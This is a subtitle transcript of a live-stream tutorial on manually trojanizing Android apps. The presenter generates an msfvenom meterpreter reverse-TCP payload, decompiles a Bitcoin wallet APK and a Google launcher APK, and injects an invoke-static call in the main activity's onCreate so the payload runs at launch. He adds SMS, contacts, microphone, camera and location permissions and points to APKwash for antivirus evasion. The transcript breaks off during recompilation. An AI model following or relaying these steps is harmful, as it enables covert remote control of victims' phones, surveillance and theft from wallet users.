Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated: 1 00:00:00,000 --> 00:00:23,440 Hey guys, thank you for joining the live stream. As you can see from the title, this video 2 00:00:23,440 --> 00:00:29,640 is going to be about embedding payloads in Android APKs. This is a video that has been 3 00:00:29,640 --> 00:00:36,400 requested for quite some time. So I'm going to be showing you that in this particular video. So 4 00:00:36,400 --> 00:00:42,640 again, the whole idea was to do it manually. So that's primarily what I'm going to be doing. So 5 00:00:42,640 --> 00:00:48,280 by default, I already have downloaded an APK here, I'm going to be using the Bitcoin wallet 6 00:00:48,280 --> 00:00:54,960 to be demonstrating this. So I'll be taking you through the overall process of doing it. So the 7 00:00:54,960 --> 00:01:00,360 first thing that we're going to be doing is generating the payload with MSF Venom. So no 8 00:01:00,360 --> 00:01:09,640 obfuscation yet. So after we generate the payload, we're then going to decompile the payload with 9 00:01:09,640 --> 00:01:16,120 APK tool. And then we'll also use our particular APK of choice and also decompile it and I'll 10 00:01:16,120 --> 00:01:21,960 show you how to embed the payload or inject the payload into a particular application or APK file. 11 00:01:21,960 --> 00:01:28,560 All right. So let us get started here. So the first thing of course, we are going to need to do 12 00:01:28,560 --> 00:01:34,440 is we are going to need to generate our payload with MSF Venom. Alright, so let's do that right 13 00:01:34,440 --> 00:01:41,920 now. So MSF Venom P, and that's our payload. And of course, with meterpreter, there are various 14 00:01:41,920 --> 00:01:46,760 modules that you can use. So for example, you can use the reverse TCP reverse HTTPS, etc. So 15 00:01:46,760 --> 00:01:53,840 reverse Android, meterpreter, and reverse TCP, I'll be stopping during the video to answer your 16 00:01:53,840 --> 00:01:58,960 questions. So yeah, you can just post them right over there. And I'll be answering them. So 17 00:01:58,960 --> 00:02:07,920 meterpreter, reverse TCP. And then of course, you can set your Lhost to 192.168.1.108. And your Lport, 18 00:02:07,920 --> 00:02:14,600 I'll set that to just 1234. And again, you then you then move on to set to actually outputting 19 00:02:14,600 --> 00:02:21,480 the file. So we'll just call this a payload.apk. And I'm on my I'm on my desktop. But in any way, 20 00:02:21,480 --> 00:02:27,400 I'll just copy that file there. So I will generate the payload. And then we can then also we'll start 21 00:02:27,400 --> 00:02:31,960 decompiling the payload first, I'll show you how to do that with APK tool. So that's the first thing 22 00:02:31,960 --> 00:02:38,880 we'll be doing. And then we can start, we can actually start decompiling the the other Android 23 00:02:38,880 --> 00:02:46,160 application. So there are many applications that you can use. So yeah, I'm going to be answering 24 00:02:46,160 --> 00:02:51,240 the questions as the video essentially takes its time during the process. Apologies if my machine 25 00:02:51,240 --> 00:02:56,280 is a bit slow here, I'm using a virtual machine with very stringent resources. So there we are, 26 00:02:56,280 --> 00:03:01,440 the payload has been generated. And we can actually get started now. Alright, so I'm just 27 00:03:01,440 --> 00:03:08,880 going to copy the payload from this directory into our desktop here. And we'll move into our 28 00:03:08,880 --> 00:03:15,960 desktop now. And we have our APK right over here. So to actually decompile an application with APK 29 00:03:15,960 --> 00:03:23,680 tool, we can, we can type in APK tool here. And then of course, we decompile, which is denoted by 30 00:03:23,680 --> 00:03:29,320 the D command, and we use the F command, and then we specify the application. So payload.apk, 31 00:03:29,320 --> 00:03:34,600 that is if it is in the working, if it is in the working directories, or otherwise, 32 00:03:34,600 --> 00:03:40,520 you need to specify the the directory of the application. So then we then move on to the 33 00:03:40,520 --> 00:03:45,880 output where we want to output the file. So I'm just going to say root desktop, the decompiled 34 00:03:45,880 --> 00:03:50,840 information, and I'll just call it payload into the payload folder and hit Enter. And that is 35 00:03:50,840 --> 00:03:57,840 going to start the the decompiling the application. Alright, so we will then move on. And let me try 36 00:03:57,840 --> 00:04:05,000 and answer some questions here. So does sys internals have a decompiler? sys internals is 37 00:04:05,000 --> 00:04:13,080 more focused on Windows and Windows management. I'll be making a video on that as well. This 38 00:04:13,080 --> 00:04:19,280 payload only works in local network, or you can set up port forwarding. That is if you have static 39 00:04:19,280 --> 00:04:25,320 IP, so that it does work. Unless if you have a dynamic IP, then if it's going to keep on changing, 40 00:04:25,320 --> 00:04:30,040 then you might not have a persistent session. So it's always good to have a static IP for that. 41 00:04:30,040 --> 00:04:36,160 Alright, so the decompilation is completed. So I'm just going to list the files in here. And you 42 00:04:36,160 --> 00:04:40,640 can see that we have the payload folder right over here. Now the interesting thing that you can 43 00:04:40,640 --> 00:04:46,600 actually do with with the payload. So if I switch into the payload directory here, we have the 44 00:04:46,600 --> 00:04:52,920 Android manifest dot XML, we have the APK tool dot the YAML file here, which are not working with 45 00:04:52,920 --> 00:04:57,800 working with the small e folder, which is the assembler, which can be considered an assembler 46 00:04:57,800 --> 00:05:03,440 for Android. So if we go into the small e folder, this is where we will have our com meta exploit 47 00:05:03,440 --> 00:05:09,320 and the stage directory. Alright, so if I change into the com, right over here, and we have the 48 00:05:09,320 --> 00:05:14,600 meta exploit, and then you'll find the payload file within the meta exploit folder, and within 49 00:05:14,600 --> 00:05:20,800 the the stage. So if I just hit enter, there we are. So we have the payload, the payload dot 50 00:05:20,800 --> 00:05:26,800 small e file right over here. So general editing of the payload application is very, very simple. 51 00:05:26,800 --> 00:05:32,520 So if I was to just go back into my previous directories here, sorry about that. Let me just 52 00:05:32,520 --> 00:05:36,480 take you a step back. So we can actually take a look at the Android manifest. So the Android 53 00:05:36,480 --> 00:05:39,840 manifest is where you can essentially edit the permissions for your payload. But of course, 54 00:05:39,840 --> 00:05:44,480 we'll be looking at that in a second. So if I just browse onto my desktop here, let me just 55 00:05:44,480 --> 00:05:50,320 open that up. Apologies, this is taking a while desktop. And we go into our payload here. And 56 00:05:50,480 --> 00:05:58,800 Android manifest dot XML. And yeah, there we are. So we have our permissions in here. And what we'll 57 00:05:58,800 --> 00:06:02,960 be looking for, and we'll be decompiling our other application in which we'll be embedding 58 00:06:02,960 --> 00:06:07,520 the particular payload is we're looking for the main activity. Alright, now this is going to be 59 00:06:07,520 --> 00:06:12,560 very important. But of course, this application has no other activity. So the default one will 60 00:06:12,560 --> 00:06:17,760 be the on create for the main activity if you've ever done Android programming. Alright, so we're 61 00:06:17,760 --> 00:06:22,960 looking particularly for these two lines of code, we're looking for the Android intent action main, 62 00:06:22,960 --> 00:06:27,120 that is the most important one right over here. And from that, you'll get the application source. 63 00:06:27,120 --> 00:06:32,800 So right over here is where you can edit your, your permissions. But these are going to be 64 00:06:32,800 --> 00:06:39,360 important, especially when embedding the Metasploit payload into your into your other Android 65 00:06:39,360 --> 00:06:44,000 application. So let's get, let's actually get started on that right now. So what I'm going to 66 00:06:44,000 --> 00:06:50,640 do is I'm just going to take a step back here. And I'll just copy the application, which is the 67 00:06:50,640 --> 00:06:57,440 Bitcoin wallet, I believe. Sorry, that is in my downloads folder. My downloads folder, like so. 68 00:06:57,440 --> 00:07:03,360 And that is in calm, I believe. What is the application name? Not sure it's telling me 69 00:07:05,040 --> 00:07:09,120 what my application name is. Did I actually download the application? Let me just check. 70 00:07:10,080 --> 00:07:15,520 I should have got it right over here. Yeah, there we are. It is the the Shellbat wallet. So let me 71 00:07:15,520 --> 00:07:20,240 just copy it here directly. So we can actually speed this up. Alright, so we can get started 72 00:07:20,240 --> 00:07:27,040 with the decompilation. Alright, so in here, we can start decompiling this APK tool again, 73 00:07:27,840 --> 00:07:34,640 APK tool, decompile F, and then we specify the application here. Sorry, this is on my Android. 74 00:07:34,640 --> 00:07:40,640 Yeah, sorry about that. The application here, we output this, I'll just call this desktop, 75 00:07:40,640 --> 00:07:45,200 and we will call this the original, the original APK and hit Enter. 76 00:07:52,720 --> 00:07:55,200 Alright, let me take a look at the questions here that we're getting. 77 00:07:55,840 --> 00:08:04,080 Um, Ryan, no, that's, that's not a question for me. How to get a static IP. That'll depend on your 78 00:08:04,080 --> 00:08:13,120 ISP and how many and what IPs they've given you. Max Fire says noob. Yeah, if you say so. 79 00:08:16,240 --> 00:08:24,640 Good, Hassan. How's everyone doing? Alright, the decompilation is complete. We can actually move on. 80 00:08:25,760 --> 00:08:30,560 Alright, so now we need to go into the original folder here. And this is where we'll be doing 81 00:08:31,120 --> 00:08:36,880 most of the editing. So again, the first thing you want to do is you want to actually create 82 00:08:36,880 --> 00:08:42,160 the Metasploit stage folder within the Smally folder. So I'll show you how to do that under 83 00:08:42,160 --> 00:08:47,680 comm. So Smally, we enter here. So we want to go into the comm directory, we hit Enter. 84 00:08:48,320 --> 00:08:53,600 And in here, we need to create the Metasploit. So we just we create the Metasploit stage folder. So 85 00:08:54,560 --> 00:09:03,600 mkdir Metasploit, CD Metasploit and make directory. We'll just call this stage and 86 00:09:03,600 --> 00:09:08,160 we'll change our directory into stage. So now what we need to do is we need to copy that initial 87 00:09:08,160 --> 00:09:15,200 payload from the Metasploit stage folder into the the Smally comm Metasploit stage folder as well. 88 00:09:15,200 --> 00:09:18,960 So that's the first thing we need to transfer the payload. And then I'll show you how to 89 00:09:18,960 --> 00:09:22,880 actually add that line of code after we do during the main activity. 90 00:09:23,440 --> 00:09:29,520 So what I'll be doing for this video, because I have a few minutes left that I can actually 91 00:09:29,520 --> 00:09:34,800 live stream, I'll be actually recording follow up videos for this showing you how to sign the APKs 92 00:09:35,360 --> 00:09:40,240 and how to obfuscate them. So let's do that first. So what I'm going to do is I'm just going to say 93 00:09:40,240 --> 00:09:46,800 copy root desktop, and we are looking for the payload. So payload, what are the directories 94 00:09:46,800 --> 00:09:53,040 we have in here? So payload, there we are, we have the Smally folder, and we want to go into 95 00:09:53,040 --> 00:10:00,160 comm Metasploit and we want the payload, the we actually get the stage and the payload dot Smally 96 00:10:00,160 --> 00:10:07,520 file right over here. And we will copy that again from that directory root desktop. And we are 97 00:10:07,520 --> 00:10:19,040 moving into the original. So original, Smally, Smally, comm Metasploit stage, and enter, 98 00:10:19,040 --> 00:10:24,400 and we should have the file in there. Alright, so that is the payload right over here. Before 99 00:10:24,400 --> 00:10:32,240 we actually move on. exploit, will this video be accessible after the stream? Yes, it will be. 100 00:10:32,960 --> 00:10:35,360 That's primarily was making this video because it was just 101 00:10:38,480 --> 00:10:45,280 Narayan Mahato asks me what I'm doing in a very obscure way. But anyway, 102 00:10:45,920 --> 00:10:54,800 I'll just I'll just forget that ever happened. So now that we have the payload dot Smally file 103 00:10:54,800 --> 00:11:00,080 within the Metasploit stage folder created under the original APK file, we can actually get started 104 00:11:00,080 --> 00:11:05,680 with editing with editing the the Android manifest file. However, the first thing as I mentioned we 105 00:11:05,680 --> 00:11:11,600 need to do is we need to look for the the main activity that is going to be launched when the 106 00:11:11,600 --> 00:11:16,560 application starts off first. So what happens is when we start that the application first for the 107 00:11:16,560 --> 00:11:21,600 first time as you do with Android for any of you have done Android programming, the main activity 108 00:11:21,600 --> 00:11:25,440 is what is started. So we are primarily looking for that. So we're going to go into original 109 00:11:25,440 --> 00:11:30,720 Android manifest open with text editor. And now this is where the exciting stuff is. So you can 110 00:11:30,720 --> 00:11:36,800 go ahead and take a look at the minimum SDK requirements. And again, what we're looking 111 00:11:36,800 --> 00:11:44,240 for is the Android intent action dot main, and the activity will be just listed as a as the top 112 00:11:44,240 --> 00:11:49,760 right over here. So this these two go under the the activity alias, which is listed as well over 113 00:11:49,760 --> 00:11:56,240 here. So we're looking for de shield batch wallet, UI wallet, wallet activity. Alright, 114 00:11:56,240 --> 00:12:02,240 so we're going to look for that directory right now. So that is de and that is under smally again, 115 00:12:02,240 --> 00:12:08,880 so smally, de, shield batch wallet, and we're looking for the UI. So we're going to look for 116 00:12:08,880 --> 00:12:14,160 the UI folder here. And we're looking for the wallet activity. Alright, so we can 117 00:12:14,160 --> 00:12:20,240 a wallet activity there we are, and we can open that up with text editor. And now we're looking 118 00:12:20,240 --> 00:12:25,920 for the on create function. Alright, so the on create again is very important, because 119 00:12:25,920 --> 00:12:30,320 we are looking for the Android OS bundle. So we can add the line right over here. Now, 120 00:12:31,120 --> 00:12:36,960 many of you will be wondering, we'll actually end it, we'll add it up below the invoke super. 121 00:12:36,960 --> 00:12:41,680 So this is we're going to be invoking a static one. And that again is going to be launching the 122 00:12:41,680 --> 00:12:48,560 payload on during an on create function, which again is going to utilize the land right, right 123 00:12:48,560 --> 00:12:55,200 over here. Alright, so now we can actually get started here. So the first thing, as I mentioned, 124 00:12:55,200 --> 00:13:01,440 we're going to get started with is we need to start copying those particular files. So before 125 00:13:01,440 --> 00:13:06,640 we actually be before we actually move ahead with this video, let me just explain what's going on. 126 00:13:06,640 --> 00:13:11,760 So we are going to be going into the wallet activity, which is going to be launched during 127 00:13:11,760 --> 00:13:15,440 the beat when the application is launched. And so during that application, we're going to use 128 00:13:15,440 --> 00:13:21,200 the on create as well here, to essentially load up the payload dot smaller file that we actually 129 00:13:21,200 --> 00:13:26,160 copied. Alright, so let us actually get started. So what I'm going to do is let me just go through 130 00:13:26,160 --> 00:13:29,920 your questions, or I'll actually go through them after this. So the first thing we're going to do 131 00:13:29,920 --> 00:13:36,000 is we're going to go to line, we will go right over here, we need to have it below the on create 132 00:13:36,000 --> 00:13:41,520 land right of that user utilizes the OS bundle here. So we're going to say, sorry, there we are, 133 00:13:41,520 --> 00:13:46,880 there it is. So I'm just going to indent appropriately. So invoke static. And again, 134 00:13:46,880 --> 00:13:52,560 we're going to use a P zero. So P zero here in curly braces, so P zero. And I'll explain what 135 00:13:52,560 --> 00:13:56,880 all of this is, I'm planning on making a separate video for this, because again, I'm going to be 136 00:13:56,880 --> 00:14:02,080 start confusing people if I go on with that. So invoke static, and then we're going to use the 137 00:14:02,080 --> 00:14:08,160 LCOM, which is the the com folder. So LCOM, and then the Metasploit folder, Metasploit, 138 00:14:08,160 --> 00:14:13,680 and then you have your stage. And you have your payload here, which again is in payload, 139 00:14:13,680 --> 00:14:18,800 you don't need to specify that it is a smaller file, so you can leave the extension. So then that 140 00:14:18,800 --> 00:14:24,800 is going to bring us up into the on create function. So on, on create, and then now we're 141 00:14:24,800 --> 00:14:30,160 utilizing Landroid again. So Landroid, the content and then the context. So it will launch every 142 00:14:30,160 --> 00:14:35,680 time the the the wallet activity is started up, which is the main activity when the application 143 00:14:35,680 --> 00:14:39,680 starts up. So yeah, there we are. So that will essentially launch the payload. And if you have 144 00:14:39,680 --> 00:14:44,640 created the payload appropriately, you set up your your exploit multi handler, and you're pretty 145 00:14:44,640 --> 00:14:49,680 good right over there to get started. So on create, and then we're using the we're using Landroid, 146 00:14:51,200 --> 00:14:57,360 or L Android, whatever you want to call it, for those of you content, and then context, context, 147 00:14:57,360 --> 00:15:03,360 and then we close that up, and we use the capital V. And we can then save this file. 148 00:15:04,400 --> 00:15:09,760 Alright, now that we're done with that, you now need to start copying the permissions you require. 149 00:15:09,760 --> 00:15:15,760 And this is unique for every application, because as you can see, the Bitcoin wallet application 150 00:15:15,760 --> 00:15:20,720 allows for these permissions, okay, they allows the camera to be used, it allows a wake lock, 151 00:15:20,720 --> 00:15:26,560 which is very, very good, allows Bluetooth NFC, the network state allows you to access the network 152 00:15:26,560 --> 00:15:32,640 state. So it has many of the important ones that we have here. So what we're going to do is we are 153 00:15:32,640 --> 00:15:37,760 going to copy the important ones. And those are going to be are going to do with the the course 154 00:15:37,760 --> 00:15:45,280 location, the file location, the phone state send SMS receive SMS record audio, call phone read 155 00:15:45,280 --> 00:15:52,320 contacts, write contacts, record audio camera, write external storage, we don't need the wallpaper, 156 00:15:52,400 --> 00:15:58,560 we'll just get rid of it from there. So we'll copy these will copy the the Android permissions here. 157 00:15:59,280 --> 00:16:07,360 And we will paste it in and delete the duplicates from here. So again, I will delete the the 158 00:16:07,360 --> 00:16:12,480 duplicates. So let me just look for one of them that I know we did have here. That was the wake 159 00:16:12,480 --> 00:16:19,280 lock, which I'm sure was up right over here. Write call log, set wallpaper, we don't need that one. 160 00:16:19,280 --> 00:16:24,960 So let's get rid of that first. Receive boot completed. camera settings, right settings. 161 00:16:24,960 --> 00:16:34,400 Yeah, that's fine. I believe I saw wake lock here. But I think, yeah, that that should be it. So 162 00:16:34,400 --> 00:16:38,400 yeah, we don't have any duplicates. So that's excellent. So we're going to save that manifest 163 00:16:38,400 --> 00:16:43,440 file here. And we are ready to go, we're ready to compile the application. So what we've done 164 00:16:43,440 --> 00:16:48,640 essentially till now, let me answer some questions before we actually recompile. So what we've done 165 00:16:48,640 --> 00:16:56,800 till now is we have we have essentially embedded the the MSF Venom payload. Now one thing to take 166 00:16:56,800 --> 00:17:03,360 into consideration is we have not particularly obfuscated the Android application, which means 167 00:17:03,360 --> 00:17:09,600 there is going to be some detection some level of detection, I'll probably be making another video 168 00:17:09,600 --> 00:17:14,960 on this, where I'll actually show you how to perform the obfuscation on a particular Android 169 00:17:14,960 --> 00:17:19,200 application. And if you want to perform obfuscation, I believe I have one of these 170 00:17:19,200 --> 00:17:24,320 links here that we used to use before and that is APK wash. APK wash allows you to essentially 171 00:17:24,320 --> 00:17:30,320 obfuscate or generate, as you can see right over Android APK antivirus evasion for MSF 172 00:17:30,320 --> 00:17:35,680 Venom generated payload. So this allows you to obfuscate various MSM MSM Venom payloads. 173 00:17:36,800 --> 00:17:43,440 And of course, I know that embedding or injecting a payload with MSF Venom already exists. And yeah, 174 00:17:43,440 --> 00:17:47,120 someone has just pointed out that the camera is a duplicate permission. So let me just check that 175 00:17:47,120 --> 00:17:53,520 out right now. Looks like we have we also have read contacts. Now there's read and write contacts. 176 00:17:54,400 --> 00:18:00,800 Let me check this right over here. I can see camera right here. Let's see if we can find there 177 00:18:00,800 --> 00:18:05,600 we are. Thank you very much for pointing that out. Thanks for pointing that out. I really 178 00:18:05,600 --> 00:18:10,720 appreciate that. I was probably looking for wake lock as well. But it really shouldn't cause an 179 00:18:10,720 --> 00:18:15,840 issue. So let me just save this right now and we can get started with the recompilation. 180 00:18:16,560 --> 00:18:23,680 Alright, so we want to recompile the original APK here. And we can do that right now. So what 181 00:18:23,680 --> 00:18:29,440 we can do is we can essentially recompile from any directory. So APK tool, and I'll say build, 182 00:18:29,440 --> 00:18:34,640 and then we can specify the directory again. So root desktop, and then we specify the original 183 00:18:34,640 --> 00:18:38,880 folder here. Now this is where things get very, very important. When you talk about using 184 00:18:39,520 --> 00:18:46,560 applications like the or scripts like the fat rat, for example, the fat rat is a tool that generates 185 00:18:47,200 --> 00:18:55,200 most likely to do a to great success, a signed payload, apart from embedding applications, 186 00:18:55,200 --> 00:18:59,600 which we know is very, very difficult to do automatically, because you usually get errors. 187 00:18:59,600 --> 00:19:04,720 So if you do get an error here, if we do get an error, then I probably have to take a deeper look 188 00:19:04,720 --> 00:19:10,160 at the application. So I'm just going to try and compile it once to recompile it once if it doesn't 189 00:19:10,160 --> 00:19:13,840 compile, then I'll probably have to find another application. But I just wanted to make a quick 190 00:19:13,840 --> 00:19:19,280 live stream for this video. So let me just answer a few questions before we carry on. 191 00:19:20,880 --> 00:19:26,000 Use t marks on a rooted Android device. Yes, more Android videos are coming. That's primarily why 192 00:19:26,000 --> 00:19:34,080 I've started with this right now. Termex hacking. Excellent. Yes, it is very, very good. Very, 193 00:19:34,160 --> 00:19:41,840 good application. Yeah, we have a good question here telling us I've tried the fat rat it failed 194 00:19:41,840 --> 00:19:47,280 with signing. Yes, that's probably because it uses zip align. And I'm not sure if we'll get an error 195 00:19:47,280 --> 00:19:53,120 right now, we probably will. But let's see what error we get. I'll probably try and and understand 196 00:19:53,120 --> 00:19:58,160 what's going on. Now this is where real skill comes into play. Because if you're going to manually 197 00:19:58,160 --> 00:20:04,000 embed, if you're going to manually embed these, these payloads into applications, it also gives 198 00:20:04,000 --> 00:20:08,800 you an opportunity to test which applications allow you to embed these various payloads, 199 00:20:08,800 --> 00:20:13,200 because some applications will not recompile at all. So it's very, very important to take 200 00:20:13,200 --> 00:20:18,800 that into consideration. So I've, I've essentially started the recompilation process. And this looks 201 00:20:18,800 --> 00:20:23,440 like it's going to work. And again, it tells us that it failed right over here. So let's take a 202 00:20:23,440 --> 00:20:28,080 look at what actually caused the error. And immediately we get the AAPT error, which I'm 203 00:20:28,080 --> 00:20:41,760 not going to explain what it is right now. So if we take so Alright, so if we take a look at this 204 00:20:41,760 --> 00:20:48,000 right over here, you can see that by default, yes, I'll be uploading the video after you can see that 205 00:20:48,000 --> 00:20:52,560 we've got an error and it's giving us an error in the Android manifest file first. But the main 206 00:20:52,560 --> 00:20:58,720 issue is with the AAPT, which means we probably need the Android SDK installed, because of the 207 00:20:58,720 --> 00:21:05,040 various requirements. So what we can do is we can just try and download another application here, 208 00:21:05,040 --> 00:21:09,680 probably a simpler application, let me just find one that's very, that's again, very, very simple. 209 00:21:10,720 --> 00:21:16,800 I'll just let me see if I can find another application. What if the main activity is 210 00:21:16,800 --> 00:21:21,280 hidden? There must be a main activity. That's a very, very good question. In fact, I'll just 211 00:21:21,280 --> 00:21:27,920 answer a question. I'll make a separate video on this. What is the main activities? Yeah, 212 00:21:27,920 --> 00:21:32,720 that's a very good question. So every application will be designed differently. And usually what 213 00:21:32,720 --> 00:21:38,320 again, what you're looking for is the Android dot intent dot main, if you can find those two lines, 214 00:21:38,320 --> 00:21:43,200 where it actually specifies the intent dot main, and it also specifies the icon, 215 00:21:44,480 --> 00:21:49,760 or the drawable icon, if it's right over there, then you essentially know that the one of the 216 00:21:51,360 --> 00:21:56,240 top group right over there that contains the activity is going to be the main activity. 217 00:21:56,240 --> 00:22:03,760 So your job is to look for that a within the smallie is to look with for that within the smallie 218 00:22:03,760 --> 00:22:09,760 compiler. Alright, so also the fat rat does not provide obfuscation. Yes, that's a very good 219 00:22:09,760 --> 00:22:15,760 question. The fat rat does not provide obfuscation, it simply signs the application. So if I was to 220 00:22:15,760 --> 00:22:19,120 compile this application, I remember the Google Now launcher did work 221 00:22:20,080 --> 00:22:24,320 with the recompilation. So I'll do that for you guys once more time once again, 222 00:22:24,320 --> 00:22:31,120 so I'll download this here. And I'll do it again with you guys. This this did work, 223 00:22:31,120 --> 00:22:36,080 what you will find is, after I have recompiled the application, I need to sign it. And that's 224 00:22:36,080 --> 00:22:40,320 where probably I can use the fat rat or I'll actually be making a separate video showing 225 00:22:40,320 --> 00:22:45,760 you how to do this. So I have downloaded the application, let me just wait for that to complete. 226 00:22:45,760 --> 00:22:51,760 Let me see if that is downloading a probably Yeah, anyway, I'll just wait for that to complete. 227 00:22:51,760 --> 00:22:58,800 So in the meantime, what I'll do is, I will just go back to my desktop here, we'll keep the payload, 228 00:22:58,800 --> 00:23:05,520 I'll get rid of the the Bitcoin wallet application here. And I will get rid of the original folder, 229 00:23:06,640 --> 00:23:11,600 which contained our our decompiled application. So we have the payload dot apk here, 230 00:23:12,480 --> 00:23:17,600 which we decompiled. And if we just list the files in here, sorry about that. If we list the files, 231 00:23:17,600 --> 00:23:22,080 we have the payload folder, which contains the payload itself, which is the most important bit 232 00:23:22,080 --> 00:23:29,040 once we start was once we start embedding. So again, I hopefully this just finishes downloading 233 00:23:29,040 --> 00:23:33,840 for some reason, it did not start downloading apologies for that. Let me just try and save 234 00:23:33,840 --> 00:23:39,600 my internet does not seem to be working right now. Or has it downloaded? My browser is unresponsive, 235 00:23:40,400 --> 00:23:50,480 sadly. So let me just read. Let me just list. Let me just list my downloads folder here. 236 00:23:51,360 --> 00:23:54,960 Looks like we do have the the application has completed downloading. So 237 00:23:56,400 --> 00:24:00,240 if I can just check the size of this looks like one of them is eight megabytes. Yeah, 238 00:24:00,240 --> 00:24:05,280 so so that looks like it's completed. So I'll just copy that com. I'll just copy the 239 00:24:05,280 --> 00:24:16,160 downloads. Let me just get rid of that there. And we'll just copy the we'll just copy the 240 00:24:16,160 --> 00:24:24,000 application to the desktop and we can decompile that immediately. Alright, so copy downloads, 241 00:24:24,000 --> 00:24:31,760 and we'll copy the com Android launcher, desktop and on it enter. And for some reason 242 00:24:31,760 --> 00:24:43,440 looks like the files looks like the downloads did not complete. Sorry, 243 00:24:44,800 --> 00:24:49,360 root downloads keep keep getting confused with that. Let me just check the downloads. It looks 244 00:24:49,360 --> 00:24:54,720 like they haven't completed yet. But for some reason, my my my browser isn't working. Let's 245 00:24:54,720 --> 00:25:00,000 see if it does prompt us to actually download that. In any case, I'll just copy I'll just 246 00:25:00,000 --> 00:25:05,200 delete the the duplicate one right over here. And hopefully we can actually copy them now. 247 00:25:06,480 --> 00:25:15,440 So I'll just copy this. All right, I love to speed through this process now. 248 00:25:16,800 --> 00:25:21,920 So that I can actually show you that the compilation does work. So what we'll do now is 249 00:25:21,920 --> 00:25:28,320 we will use the APK tool, APK tool, decompile, and we'll com.google right over here. 250 00:25:29,920 --> 00:25:38,880 And we'll call this original hit enter. For some reason, oh, sorry, I forgot the output file, 251 00:25:38,880 --> 00:25:44,560 that is the output parameter right over here. And we're just gonna wait for this to decompile. So 252 00:25:44,560 --> 00:25:50,560 let me just answer some of the questions. Yes, I have duplicates. Just saw that downloaded the 253 00:25:50,560 --> 00:25:56,160 file twice. So yeah, we've decompiled the application. Let me just try and answer 254 00:25:58,000 --> 00:26:03,360 one more question. Let me just see if we have any other questions before I continue. 255 00:26:05,360 --> 00:26:09,360 What is this for? This video is focused on how to manually embed payloads, 256 00:26:09,360 --> 00:26:20,400 MSF Venom payloads in Android APKs. At least I got to see you brother salam. Hello, Naheed 257 00:26:20,480 --> 00:26:30,480 thank you for joining the stream. Yeah, that looks to be like the only questions there. All right, 258 00:26:30,480 --> 00:26:35,440 so we can get started now. So I'm just going to change the directory into the original folder here. 259 00:26:36,160 --> 00:26:40,720 And again, we're going to go into the smally folder again, smally list the files in their CD 260 00:26:40,720 --> 00:26:49,760 com. And we will create our Metasploit directory again. Metasploit CD Metasploit again here. 261 00:26:51,360 --> 00:26:56,640 Stage. And, and we can just leave the stage in there. So what we're going to do is we're going 262 00:26:56,640 --> 00:27:01,760 to say CD root desktop or sorry, we're going to copy the payload file here. So copy root desktop 263 00:27:01,760 --> 00:27:08,560 payload, smally, and we're looking for the Metasploit is that the com Metasploit sorry, 264 00:27:08,560 --> 00:27:16,720 and the stage and the payload dot smally file into the root desktop original. And we're looking 265 00:27:16,720 --> 00:27:24,320 for the smally com Metasploit stage directory hit enter if we list the files in there sorry stage 266 00:27:24,880 --> 00:27:29,040 list the files in here we have the payload file. Alright, so now we can move on into the Android 267 00:27:29,040 --> 00:27:33,360 manifest file once more to actually explore what's going on. So we'll go to the original 268 00:27:33,360 --> 00:27:38,000 Android manifest file. Let me just close the previous ones here. Because I don't want to 269 00:27:38,000 --> 00:27:42,640 get confused with the other ones that we had for the other application. And we'll get I will get 270 00:27:42,640 --> 00:27:48,480 rid of this as well because we're not working with that activity file. So Android manifest dot xml. 271 00:27:50,080 --> 00:27:54,800 And now you can see with a simple application again, all we're looking for is we're looking 272 00:27:54,800 --> 00:27:59,600 for the action right over here. So the Android intent dot action main. And just above this, 273 00:27:59,600 --> 00:28:04,480 you will get the Android name right over here. So you have com Google Android launcher stub app. 274 00:28:04,480 --> 00:28:09,600 Alright, so that is the activity that we are primarily looking for. Okay, so we need to look 275 00:28:09,600 --> 00:28:13,920 for that activity and the directories listed right over here. So you have com Google. So if 276 00:28:13,920 --> 00:28:20,240 you go to smally com, Google, Android launcher, and we're looking for the stub app. Alright, 277 00:28:20,240 --> 00:28:24,960 so again, you can simply just find it right over here stub app. And we can open that up with a 278 00:28:24,960 --> 00:28:33,360 text editor. And we are looking for on create, sorry, on create. And there we are, we have the 279 00:28:33,360 --> 00:28:37,760 on create right over here. So again, we're going to create our invoke static. So let me just do 280 00:28:37,760 --> 00:28:44,800 that really, really quickly. Invoke static. And we're looking for P zero curly braces always when 281 00:28:44,800 --> 00:28:50,080 specifying arguments with Android, sorry. And then we're looking for the land right. 282 00:28:51,920 --> 00:28:56,480 And of course, with the land right now you can with with this I need to also explain something 283 00:28:57,760 --> 00:29:03,520 something important. If you do want to if you have created a payload that does use an activity, 284 00:29:03,520 --> 00:29:07,680 this is a great place of doing it. Alright, I just wanted to make sure that you guys understood 285 00:29:07,680 --> 00:29:16,000 that before we continue. Alright, so land right metasploit stage. So again, metasploit metasploit 286 00:29:16,000 --> 00:29:22,320 stage, let me just get that right. Yep, stage metasploit stage payload. And we're looking for 287 00:29:22,320 --> 00:29:30,880 this particular on create method. So on on create land right. And we are using the content and the 288 00:29:30,880 --> 00:29:38,000 context here. So content, based on the content, and the context, context is always in capital. 289 00:29:38,960 --> 00:29:44,320 And we'll close that up capital V, and we'll save that. Alright, now we can deal with the 290 00:29:44,320 --> 00:29:48,560 the original Android manifest, and I'm going to open up the Android manifest for the payload 291 00:29:48,560 --> 00:29:56,320 application. Because this particular Google launcher does not have any, any useful, 292 00:29:56,320 --> 00:30:03,600 any useful permissions. So we only have read settings and write settings. So what I'll do is, 293 00:30:04,960 --> 00:30:09,520 we can essentially just copy everything. So we do need internet, we need the Wi Fi state, 294 00:30:09,520 --> 00:30:14,720 we'll just copy everything here, we'll get we'll get rid of the right settings option as well. 295 00:30:15,840 --> 00:30:20,880 And the we can also do that right here, we don't want to mock with the original application 296 00:30:20,880 --> 00:30:25,280 permission, otherwise that can affect its functionality. So again, we'll get rid of 297 00:30:25,280 --> 00:30:33,200 write settings here. I will get rid of write settings. And now we can save this file. And 298 00:30:33,200 --> 00:30:37,440 hopefully we should be able to compile this application now without any errors. As far as 299 00:30:37,440 --> 00:30:41,120 I remember, this was the only one working. So again, before we do that, let me just try and 300 00:30:41,120 --> 00:30:54,000 answer some questions. Harsh Dinani. I love your videos. I'm a commerce student said I practice 301 00:30:54,000 --> 00:30:58,720 that's excellent. That's primarily why these videos are there. So go ahead just enjoy practicing. 302 00:30:58,720 --> 00:31:05,280 That's what it's all about. So again, we'll use the APK tool. And we will build so build a root 303 00:31:05,840 --> 00:31:10,160 desktop and we'll use the original folder in it and to hopefully now the application. 304 00:31:11,840 --> 00:31:16,000 There we are, the application was successfully compiled, we did get the AAPT error, but that 305 00:31:16,000 --> 